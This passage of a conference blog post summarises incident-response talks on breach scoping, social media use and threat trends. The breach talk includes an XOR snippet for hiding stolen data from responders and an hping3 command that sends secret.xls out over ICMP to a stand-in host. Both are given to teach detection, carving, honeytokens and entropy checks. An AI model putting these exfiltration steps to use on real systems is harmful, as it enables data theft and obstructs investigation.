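    """One-time-pad style XOR; with a truly random key of equal length,
    the ciphertext alone reveals nothing about the plaintext."""
    return bytes(b ^ k for b, k in zip(data, key))

secret = b"contents of quarterly-figures.xls"   # hypothetical stolen data
key = os.urandom(len(secret))                    # random key, same length
ciphertext = xor_encrypt(secret, key)

# The attacker copies `ciphertext` off the system, then destroys the key.
# Without the key, a responder cannot determine what was taken.
del key
```

Real tools would use a proper cipher rather than a raw one-time pad, but the responder-facing consequence is the same: no key, no recovery.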

In physical access cases .:

  • Monitor account/system usage
  • Preserve evidence / chain of custody
  • Determine type of affected data
  • Contact legal advisers
  • Lockout / monitor (depending on situation)
  • Identify systems that could also be exposed

Scenario: Attacker Logical Access

Use of covert channels to exfiltrate the data without triggering defenses

Examples of covert channels :

  • ICMP Echo Request Tunneling (Loki)
    • Implemented using hping3 -E secret.xls -1 -u -d 1024 nonexistent.domain.com
    • Capture using tcpdump

Hard to track where the data is going (ICMP to a nonexistent domain). The attacker must be somewhere along the line to capture the data using tcpdump. Open the capture in Wireshark and then carve out the file.
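
The carving step can be sketched as follows. This is a minimal illustration (not from the talk), assuming the responder has already extracted (ICMP sequence number, payload) pairs from the pcap, e.g. via a Wireshark filter on echo requests:

```python
def carve_icmp_exfil(packets):
    """Reassemble data smuggled out in ICMP echo-request payloads.

    `packets` is a list of (icmp_sequence, payload_bytes) tuples as a
    responder might pull them out of a capture. Payloads are stitched
    back together in sequence order, mirroring what hping3 -E split apart.
    """
    return b"".join(payload for _, payload in sorted(packets))

# Example: three chunks captured out of order
chunks = [(2, b"ret "), (1, b"sec "), (3, b"data")]
print(carve_icmp_exfil(chunks))  # b'sec ret data'
```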

How to protect against this ?

  • Track the data export at the database
  • Log commands run on servers / applications installed on servers
  • Should this server be sending Echo Requests ? Block and Log
  • Watch for proprietary data on the wire (in cleartext)
    • Using RegEx to detect set data
    • Implement using something like Snort
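
As a rough sketch of the regex approach (in production this would live in a Snort rule rather than a script; the pattern and marker format here are entirely hypothetical):

```python
import re

# Hypothetical pattern for internal part numbers such as "PRJ-1234-XYZ";
# swap in whatever uniquely identifies your proprietary data.
PROPRIETARY = re.compile(rb"PRJ-\d{4}-[A-Z]{3}")

def flag_cleartext_leak(payload: bytes) -> bool:
    """Return True if an outbound payload contains a proprietary marker."""
    return PROPRIETARY.search(payload) is not None

print(flag_cleartext_leak(b"GET /?q=PRJ-7712-ABC HTTP/1.1"))  # True
print(flag_cleartext_leak(b"GET /index.html HTTP/1.1"))       # False
```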

Use honeytokens to trigger alerts. Insert dummy records into the database (records that should never be returned unless the whole table is dumped), and files with seemingly interesting data (passwords.xls) in a non-browsable area of your website. Insert code comments into the source of your internally developed applications and create rules to alert on/block traffic leaving your network containing these comments.
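
The alerting side can be as simple as a substring match on outbound traffic. A minimal sketch, with invented token values (any real deployment would pick tokens that cannot occur in legitimate traffic):

```python
# Hypothetical honeytoken records seeded into the customer table;
# these values should never appear in legitimate outbound traffic.
HONEYTOKENS = {
    b"jane.doe.canary@example.com",
    b"4929-0000-0000-0001",
}

def honeytoken_hit(outbound: bytes) -> bool:
    """Return True if any seeded honeytoken appears in an outbound payload."""
    return any(token in outbound for token in HONEYTOKENS)

print(honeytoken_hit(b"dump: jane.doe.canary@example.com,4929-0000-0000-0001"))  # True
print(honeytoken_hit(b"regular web traffic"))                                    # False
```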

This doesn’t prevent exposure, and doesn’t tell you the depth of the issue, however the first piece of the puzzle is being aware that something bad is happening.

Issues: Encryption of the data will prevent this honeytoken being tracked.

Solution: Frequency analysis – detect the frequency of hex values to discover if the data is encrypted. Search and alert on encrypted data where it is not part of the normal traffic pattern. Entropy-based anomaly detection through the Snort platform. No plugin exists yet for this purpose. Stay tuned…
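
The underlying idea can be sketched in a few lines: Shannon entropy over byte frequencies sits near 8 bits/byte for encrypted or compressed data, and much lower for text. This is a toy illustration of the technique, not the (still unwritten) Snort plugin; the 7.5 threshold and 256-byte minimum are arbitrary choices:

```python
import math
import os
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for encrypted/compressed data,
    typically 4-5 bits for English text."""
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def looks_encrypted(payload: bytes, threshold: float = 7.5) -> bool:
    # Skip tiny payloads: the entropy estimate is too noisy below ~256 bytes
    return len(payload) >= 256 and shannon_entropy(payload) > threshold

print(looks_encrypted(os.urandom(4096)))                     # True
print(looks_encrypted(b"plain old ascii log lines " * 100))  # False
```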

Last point of recovery process needs to be an improved preventative posture. Lessons learned.

What we’ve learned :

  • Think like an evil insider
  • Log everything possible to improve the scoping of the breach

14:30 Using Social Media in Incident Response – Martin McKeay

Staff / responders that use social media release information live as it comes in. Because this is a live response, it can often be more about emotion than about fact. A majority of companies have no policy for electronic media (including social media). Those that do have a policy do not always enforce it, or make staff aware of their responsibilities.

Companies are slow to come to social networking and are seeing issues when they look to claim their company name or trademark. Who is currently using your company name on Twitter, Facebook, MySpace, etc… ? There are incidents of non-staff taking the name of companies and using it to communicate as if they were the company. There are also cases of unauthorized staff using the company name within social networking sites or blogs. Readers of official company blogs and social media services are unforgiving when it comes to pure marketing and sales messages. In order to have a useful communication tool for handling and communicating incidents, you have to build followers and readers prior to having an incident. This takes more than just posting up marketing information and expecting people to listen.

Company policy should dictate what happens when an incident occurs. If you suddenly stop twittering/blogging then people will notice and think the worst. News travels fast on social networks, and unless you supply the news, this information can come from any source and be based on pure speculation. The AT&T outage is a good example: many users on Twitter were mapping out the areas suffering a connection outage while AT&T didn’t talk about the issue openly. This caused damage to AT&T’s reputation.

Key points .:

  • Assign person who will communicate
  • Policy on what to communicate
  • Who is dealing with the blogosphere / social media

16:30 Emerging Threats and Attack Trends – Paul Oxman

Threats are moving up the stack towards targeting individuals.

Designer malcode is now being developed using bleeding-edge software development techniques and protections. As with other software maturity models, malware has also begun to adopt the same processes. Backup malcode is made available to customers to replace the original once AV vendors catch up and start detecting the attack code.

Large-scale worms are getting rarer as attacks become more targeted and selective. As the large-scale attacks drop, the cybercrime profits have increased. Email as an attack vector is also slowing as web based vectors increase in popularity. Blended attacks are becoming more prevalent.

Cyber-terrorism – Future conflicts are much more likely to have a cyber element to them.

2008 Security

  • 70% of the top 100 websites pointed to (or contained) malware
  • Number of vulnerabilities up 11% from 2007
  • Reputation HiJacking on the increase
  • Attacks are more targeted to help maximize effectiveness
  • More reliance on blended threats

Issues of hardware being infected at the “source” to catch consumers off guard. A user is more likely to accept an install request when they plug in a new device (i.e. a digital photo-frame).

Attackers are taking information gathered from phishing attacks and using it on various popular services to catch users who are relying on a limited set (or even just one) password for multiple services/sites.

July 2008 – 45% of browsers still vulnerable despite auto-update features.

Malware targeting current events (Olympics was a prime target for attack). The fake Olympics website netted 40-50 Million USD, and gathered username/passwords for further attacks on websites.

Known vulnerabilities are left unpatched. Attackers don’t have to come up with 0-day attacks if they can exploit known issues.

Case study of how the creators of Conficker evolved their attack by updating from MD5 to MD6, and then patching a flaw in MD6 when it was found to be vulnerable. 85% of the code was replaced from one version to the next. Not your average malware.

Threats on the horizon:

  • SMS vishing
  • Extensive social engineering
  • More highly targeted attacks
  • Attacks on mobile devices (OS diversity is an issue for attackers)
  • Using video sharing sites as a method for distribution of malware

Incident response. The most important factors are preparation for the (inevitable) attack/incident, and the post-mortem to learn from your response (often forgotten or skipped).

Well that’s all from day 1. No sushi yet, but the night is young. More to follow after day 2 😉